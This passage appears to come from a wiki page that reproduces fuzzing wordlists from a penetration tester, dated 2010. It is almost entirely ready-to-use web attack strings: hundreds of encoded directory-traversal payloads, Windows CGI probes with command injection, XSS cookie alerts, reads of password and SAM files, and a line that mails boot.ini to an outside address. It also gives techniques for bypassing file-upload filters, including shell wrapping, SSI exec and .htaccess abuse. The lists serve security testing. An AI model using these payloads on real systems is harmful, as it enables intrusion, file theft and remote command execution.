..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010)&lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Generic (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - PHP Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
# PHP on Windows&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Microsoft Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
